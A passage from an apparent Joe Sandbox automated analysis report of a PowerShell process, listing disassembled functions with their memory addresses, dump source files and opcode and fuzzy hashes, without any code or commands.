                                                                              • Instruction Fuzzy Hash: 41916931B1DA5D0FD768EB6CA825AB57BD1EF99310F1501BBE08DC72A7C9189D828381
                                                                              Function 00007FFD9B9267E8 Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: H
                                                                              • API String ID: 0-2852464175
                                                                              • Opcode ID: d2d5bd4cdb5592cb8b41575762221437433e78d053893009b9fb3907f4e46273
                                                                              • Instruction ID: c78c878dd32e127d0c074867c8ee6490a0e913d1de64b7ae5fd7e7b193fc9f85
                                                                              • Opcode Fuzzy Hash: d2d5bd4cdb5592cb8b41575762221437433e78d053893009b9fb3907f4e46273
                                                                              • Instruction Fuzzy Hash: DD514B22F1EA4D1FEBA5A67C58796B93BC1DF55210B0600BBD44EC32F3DD19AD468341
                                                                              Function 00007FFD9B926000 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: H
                                                                              • API String ID: 0-2852464175
                                                                              • Opcode ID: 234699d8e261968b02da389d71b6b68bb6775aed118c0f0105dbd85e50f19cd2
                                                                              • Instruction ID: 037927820792dd7910aeac96e7b708f05291b7322a57a1ab94046ac33eaf237f
                                                                              • Opcode Fuzzy Hash: 234699d8e261968b02da389d71b6b68bb6775aed118c0f0105dbd85e50f19cd2
                                                                              • Instruction Fuzzy Hash: 2E412832F1994E5FEBA4EA6894653BD73D1EF98310F410179E40ED32E2DE296D468381
                                                                              Function 00007FFD9B92A4C8 Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: H
                                                                              • API String ID: 0-2852464175
                                                                              • Opcode ID: 8bef9cbcada5e79c9da10fc0bfa71cafd23e90711be8b58cc7a2fbbc341314d7
                                                                              • Instruction ID: d4ac4a36de4ad04086044e1b10802e2b393182ac19731d4972d27d4ff04b284d
                                                                              • Opcode Fuzzy Hash: 8bef9cbcada5e79c9da10fc0bfa71cafd23e90711be8b58cc7a2fbbc341314d7
                                                                              • Instruction Fuzzy Hash: E4214721F1EB4D0FEBA4A67C487967937C1DF98210B06057BD44EC32F2CD19AD424381
                                                                              Function 00007FFD9B926268 Relevance: .6, Instructions: 614COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b2a0010cac617d31eeb8b081e8ab6599bba5330f5936c0c03fd83ef55794ce81
                                                                              • Instruction ID: da356d2d973e08b1c34e7609aacbc98989e59f4dc0ee18c4d56ea3f646cc0936
                                                                              • Opcode Fuzzy Hash: b2a0010cac617d31eeb8b081e8ab6599bba5330f5936c0c03fd83ef55794ce81
                                                                              • Instruction Fuzzy Hash: 26224C34A1894D8FDF98EF1CC898AA977E1FF69301B0501A9E85ED72A1DB35EC41CB40
                                                                              Function 00007FFD9B92AB8D Relevance: .6, Instructions: 554COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b33751481380092fcb8e021a8e573f17843207d24cfac7690df5d5f7d2538656
                                                                              • Instruction ID: f4f665b8fbb91dd3a44cf3b40206167916b6c1775669f104be405a3a64c0acc4
                                                                              • Opcode Fuzzy Hash: b33751481380092fcb8e021a8e573f17843207d24cfac7690df5d5f7d2538656
                                                                              • Instruction Fuzzy Hash: 3A41F417F1F6DA6FE77292B858752A83FE1AF52210B1A00FBD0D8CB1A3D90869468341
                                                                              Function 00007FFD9B9F491E Relevance: .5, Instructions: 520COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1885028233.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 39340d1696e07d66a969a97a7976e28fc84afa56cb2eaf3ae01f1b52e757e8e1
                                                                              • Instruction ID: e7da2b55997f94d31e8164201ead13ee3519f22f2bb65420578dd00338ac7703
                                                                              • Opcode Fuzzy Hash: 39340d1696e07d66a969a97a7976e28fc84afa56cb2eaf3ae01f1b52e757e8e1
                                                                              • Instruction Fuzzy Hash: 71F12722B1FBC91FE7A6977948656A47FE0EF52260B0A01FFD08DC72E3D918AD458341
                                                                              Function 00007FFD9B9F356D Relevance: .4, Instructions: 413COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1885028233.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 74caac95f9076e8c60bfa1c144233e1efac3eaed07ef7b3769bc3e4ca90af7ce
                                                                              • Instruction ID: 02c256d13c662fbad4803233d89e0f50b3e21aac4425062096e5078d2ebe2aab
                                                                              • Opcode Fuzzy Hash: 74caac95f9076e8c60bfa1c144233e1efac3eaed07ef7b3769bc3e4ca90af7ce
                                                                              • Instruction Fuzzy Hash: 8BD14571B1EA8E1FEBA5EB6888655B87FE0EF55320B0900BFD05DC71F2DA18AD058341
                                                                              Function 00007FFD9B92860D Relevance: .3, Instructions: 275COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ec5d77f9618c2be33d022b67516084a43b0e48a2ea7bce50387e314ae37a594d
                                                                              • Instruction ID: acfc8e193b5cc06496831d1c59af3436510aa2d7f4558fae701c2020bec63107
                                                                              • Opcode Fuzzy Hash: ec5d77f9618c2be33d022b67516084a43b0e48a2ea7bce50387e314ae37a594d
                                                                              • Instruction Fuzzy Hash: A3711631F2E94C5FDB65E76888A56B877E1EF85300F0500BAD44EC76A7DE28AD428781
                                                                              Function 00007FFD9B926D6D Relevance: .2, Instructions: 250COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2e62847ec29814c21ec8f73062ba1a7a506cbbad73b15831848ed9dcf32c5d09
                                                                              • Instruction ID: fab6be2d100a703dea8fd624d5df2bec65cc2c886426389b4b796aeb1ad6b5ca
                                                                              • Opcode Fuzzy Hash: 2e62847ec29814c21ec8f73062ba1a7a506cbbad73b15831848ed9dcf32c5d09
                                                                              • Instruction Fuzzy Hash: 7771C621F29D1E4BEBA4F7AC8825ABD63D2EF54700B514175D05EC3AE6DE28BD428380
                                                                              Function 00007FFD9B9F080E Relevance: .2, Instructions: 224COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1885028233.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8f5750bbf342c98e23ddda25db7cacbbbbd6a4a88419963e7acb26adcaaf2e6f
                                                                              • Instruction ID: 67f496b0552f505f11221dc7a3d54f6e4845be269c8b33e1d187eac0fc6a77c4
                                                                              • Opcode Fuzzy Hash: 8f5750bbf342c98e23ddda25db7cacbbbbd6a4a88419963e7acb26adcaaf2e6f
                                                                              • Instruction Fuzzy Hash: EF613B22B1FA9B1FF7B99BA814712B56BC1DF95630B4A00BED05EC31E7ED09AD448341
                                                                              Function 00007FFD9B92793C Relevance: .2, Instructions: 222COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 78dd8a82f3441ba393985f2d2f41f3a1ce5b37e86a1b74f5d7d8d0f0359e8465
                                                                              • Instruction ID: a386db2e6a65b82dddfa74538446eba00fc812b307e520c0b2ee70cdd20883ad
                                                                              • Opcode Fuzzy Hash: 78dd8a82f3441ba393985f2d2f41f3a1ce5b37e86a1b74f5d7d8d0f0359e8465
                                                                              • Instruction Fuzzy Hash: 7061C621F2E90E1AEB68ABB848717BD63D2EF88354F5640B9D05ED32D7DD2DAD024341
                                                                              Function 00007FFD9B9F49EF Relevance: .2, Instructions: 219COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1885028233.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5cdb3538f764069d3cda79e1166b72103c7f0c541b573eb93b8991fb356a36d8
                                                                              • Instruction ID: e2dd301c4ac9ae78dbbb5570ef9bb2eca6678c8ea40315ccc0522213a9841bbc
                                                                              • Opcode Fuzzy Hash: 5cdb3538f764069d3cda79e1166b72103c7f0c541b573eb93b8991fb356a36d8
                                                                              • Instruction Fuzzy Hash: D8610B22F2FA8A1FE7B49A7A04B47786BD1EF64261B1A00BDD45DC72E7DD189C418341
                                                                              Function 00007FFD9B927315 Relevance: .2, Instructions: 201COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 78e62226d15013306876b02792758a35888e5eac17d52d1af949890262d6652f
                                                                              • Instruction ID: f70a29ea7b09665ab757958148c17e009cea5ed793bbfdbfe297c9b678525ba9
                                                                              • Opcode Fuzzy Hash: 78e62226d15013306876b02792758a35888e5eac17d52d1af949890262d6652f
                                                                              • Instruction Fuzzy Hash: D551D630B1EA495FD7A4EF6CD464A657BE1FF5931170600BAE489C72B2DA28EC81C781
                                                                              Function 00007FFD9B92A710 Relevance: .2, Instructions: 175COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                              • Instruction ID: 1e680bccaa898293ef83bf82e7ac7364f5aebd11e1679202d106f581de6cc9d9
                                                                              • Opcode Fuzzy Hash: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                              • Instruction Fuzzy Hash: E841E73131581C8FDAE4EB5CE898E6877E1FF6C31271605E6E44ACB271DA26DC81CB40
                                                                              Function 00007FFD9B9267A0 Relevance: .2, Instructions: 156COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a590a31f9e642a49984177bb78c93959c8db463aac6a1083624c9b398f6adcb6
                                                                              • Instruction ID: c73067184f08fbd257956a9bba63014f76b13759e39711e80888050db706967b
                                                                              • Opcode Fuzzy Hash: a590a31f9e642a49984177bb78c93959c8db463aac6a1083624c9b398f6adcb6
                                                                              • Instruction Fuzzy Hash: 72418C21F2DD0E5FEBA8F6AC9065AB973D1EF58310B1544B9D04EC32A6DE29FD818740
                                                                              Function 00007FFD9B927954 Relevance: .1, Instructions: 142COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 96db6d56b0416967938deb00c2a90ea0964573ec213240a46b7b4ffbddf84da0
                                                                              • Instruction ID: 5d7caf61680661d2b1f5d658e6fb19e5106152e1d2f417bb5e3afbf7a0e5be2e
                                                                              • Opcode Fuzzy Hash: 96db6d56b0416967938deb00c2a90ea0964573ec213240a46b7b4ffbddf84da0
                                                                              • Instruction Fuzzy Hash: 9E41B731F2E90A1AFB68AB7848717B863C3EF99314F5640B9D45ED32E7DD2DAD418201
                                                                              Function 00007FFD9B9F085A Relevance: .1, Instructions: 142COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1885028233.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 67fc9232014db1e847a4e92bf7939a0f25b8e29275fb6084dc3b8e68e163b0f9
                                                                              • Instruction ID: c7a4cf4cd398a20b2e881d5385131c199b6e66570da4d68355b22f37522bb887
                                                                              • Opcode Fuzzy Hash: 67fc9232014db1e847a4e92bf7939a0f25b8e29275fb6084dc3b8e68e163b0f9
                                                                              • Instruction Fuzzy Hash: E5414812F2FA8B1BF7B99BA804712786BC1DF91670B5A00BAD45DC31E7ED0DAD404301
                                                                              Function 00007FFD9B927949 Relevance: .1, Instructions: 136COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 62aeb82732d706e2ddea33948b853f4da629ca13d5b7b760447b8d51ce7e4035
                                                                              • Instruction ID: 2db76f8bc761b9792a2e931b44c7ddc63773675e79359884e0a3135bec775e8a
                                                                              • Opcode Fuzzy Hash: 62aeb82732d706e2ddea33948b853f4da629ca13d5b7b760447b8d51ce7e4035
                                                                              • Instruction Fuzzy Hash: 5F41A531F2E90A1AEB68AB6858717B863C3EF89314F5640B9D45ED32E7DD2DAD418201
                                                                              Function 00007FFD9B9F369C Relevance: .1, Instructions: 129COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1885028233.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 65547209769dba76cf2a7ec1a2e6b8bb25e822b48affbdb49ec165fd879d6e85
                                                                              • Instruction ID: 52f61605de7ebe171642d324d82c1ec385b43d37545cbc63052294946e780344
                                                                              • Opcode Fuzzy Hash: 65547209769dba76cf2a7ec1a2e6b8bb25e822b48affbdb49ec165fd879d6e85
                                                                              • Instruction Fuzzy Hash: B7410862B2FA8E5FEBB4976858755B96BD0EF14360F5900BAD45DC32F2DE1C6C408340
                                                                              Function 00007FFD9B92A189 Relevance: .1, Instructions: 113COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: eb63cc7a9763de5bbee861fd66db01def985665a3b9dd285a7e09ef78b9b2679
                                                                              • Instruction ID: d7f77eb31acf578ceadc1281f053f25a9c6ce4b47e2f163fe5fe5abd20370ef8
                                                                              • Opcode Fuzzy Hash: eb63cc7a9763de5bbee861fd66db01def985665a3b9dd285a7e09ef78b9b2679
                                                                              • Instruction Fuzzy Hash: 58312632E1E68E5FEBA4DB5894613B937E1EF98310F06017AE40DC32E2DE296D458380
                                                                              Function 00007FFD9B926728 Relevance: .1, Instructions: 111COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 083d318ad3ac789bf724f7391b62801cb50aecd74344d877b855133a4f87cb96
                                                                              • Instruction ID: 62f2e12ff0f9ffeaa8be978e3b1eea5f4fbbdc6e3c671657232b0770161f079c
                                                                              • Opcode Fuzzy Hash: 083d318ad3ac789bf724f7391b62801cb50aecd74344d877b855133a4f87cb96
                                                                              • Instruction Fuzzy Hash: 1A31C331F1994D5FDBA8E779C465F6577D1EF99300F0500B9D04ECB2A2DA18AD82C740
                                                                              Function 00007FFD9B929631 Relevance: .1, Instructions: 88COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f6a0195ef0f6849eaf01898472019c3aac39495dabd368c2fee55a1608ed28fb
                                                                              • Instruction ID: 5d03fb52e995179189d28eb9f80793e643dbd4225073e6ed6e7cf346b8f6873c
                                                                              • Opcode Fuzzy Hash: f6a0195ef0f6849eaf01898472019c3aac39495dabd368c2fee55a1608ed28fb
                                                                              • Instruction Fuzzy Hash: 1D21C030629E4C9FCBA8EA6CC59896573E1FF5831134505BDD08AC7AB1DA24FC41C740
                                                                              Function 00007FFD9B92A6F1 Relevance: .1, Instructions: 77COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 889175632fe88072449706598fe7f6f5618adef3a06be918b19f624e84ac1d76
                                                                              • Instruction ID: 11dad88607d17961dd02235a8909d8b1a12ad09a63806f69d3010cb36a51f2d3
                                                                              • Opcode Fuzzy Hash: 889175632fe88072449706598fe7f6f5618adef3a06be918b19f624e84ac1d76
                                                                              • Instruction Fuzzy Hash: 77117F32B1E88C5FDB95EB6CD8689647BE1EF2A31131A00F3D088CB172D915ED84C740
                                                                              Function 00007FFD9B9263A2 Relevance: .1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: eb5e1aa381e1430d2c692d5601ee990c21932d717572f77ee7f2fe466a10f6cb
                                                                              • Instruction ID: cf285d8323739912e98df544e9ed63a1e73d433e523a65c6523af0a1c38eb923
                                                                              • Opcode Fuzzy Hash: eb5e1aa381e1430d2c692d5601ee990c21932d717572f77ee7f2fe466a10f6cb
                                                                              • Instruction Fuzzy Hash: 5A014072F1DA1C1BE76C9A5C78122B973C1EBC9621F15023FE49FD3692DE1669034286
                                                                              Function 00007FFD9B9263B6 Relevance: .1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4c248c86d2c626fcdef4784396935fd0d4d6ed2aff4b950191e268a5d98508b9
                                                                              • Instruction ID: 12fea24fafd47f73a19638cca697c8a54d32008d9685df20639e5569cfeb5f81
                                                                              • Opcode Fuzzy Hash: 4c248c86d2c626fcdef4784396935fd0d4d6ed2aff4b950191e268a5d98508b9
                                                                              • Instruction Fuzzy Hash: DD018072F1DA1C1BE6689A5C68161B973C1EBC9621B15033FE49FC2692DE1568034285
                                                                              Function 00007FFD9B9263C7 Relevance: .1, Instructions: 71COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 70f56770e7069895e3e04ce9bbc725252775061abd35753c50bd155266f72167
                                                                              • Instruction ID: 530b8fb225aa7eaec1d43ea74dee5b491296530be984de0640f39af52393026a
                                                                              • Opcode Fuzzy Hash: 70f56770e7069895e3e04ce9bbc725252775061abd35753c50bd155266f72167
                                                                              • Instruction Fuzzy Hash: 9B0192B2F1DA0C0BE76C9A5C68121B973C1E7C9630B05033FE59FC3692DE2568034285
                                                                              Function 00007FFD9B92A852 Relevance: .1, Instructions: 68COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 875f1af9cde2f98529b8a80c9487f119d054f752dbadc200b8f8192149253fdc
                                                                              • Instruction ID: 875892fdf22dc4df2d9787f2000950e63f903b9d6dd18fa31a52a3a296830254
                                                                              • Opcode Fuzzy Hash: 875f1af9cde2f98529b8a80c9487f119d054f752dbadc200b8f8192149253fdc
                                                                              • Instruction Fuzzy Hash: AE218430A0DA4D4FDB9AEB28C464F61BBE1EF55300F0944E9D04DCB2A3DA25EC82CB00
                                                                              Function 00007FFD9B92A348 Relevance: .1, Instructions: 68COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4fe848b9b17764a24aae42c4316b32d047fe9bfb1cd01dfa52784c67352e895c
                                                                              • Instruction ID: f4c00b6ec292ee4d19cc51f74cf0600c527aad7d59d62ff2447e443169c3a8ed
                                                                              • Opcode Fuzzy Hash: 4fe848b9b17764a24aae42c4316b32d047fe9bfb1cd01dfa52784c67352e895c
                                                                              • Instruction Fuzzy Hash: 7111CC33F1EA8C1FD721A7609C308E63FE6EF82310B0501ABD04DC71A2D959AA46C340
                                                                              Function 00007FFD9B923975 Relevance: .0, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                              • Instruction ID: 9d1bee153a805d5a12f66e32b099c4d6af3ade425a0a860db42cfbf9b63cd792
                                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                              • Instruction Fuzzy Hash: FE01677121CB0C8FD748EF0CE451AA5B7E0FB95364F10056EE58AC36A5D636E881CB45
                                                                              Function 00007FFD9B92A30B Relevance: .0, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 928a8357bebca6c745b5009d5e184d9d42a9a4869713331e6ad0e678ec40fa35
                                                                              • Instruction ID: 3a132e564386a6788268944d0662bd9f1d2fd480b46c3f9aedbad1132c0c7b3f
                                                                              • Opcode Fuzzy Hash: 928a8357bebca6c745b5009d5e184d9d42a9a4869713331e6ad0e678ec40fa35
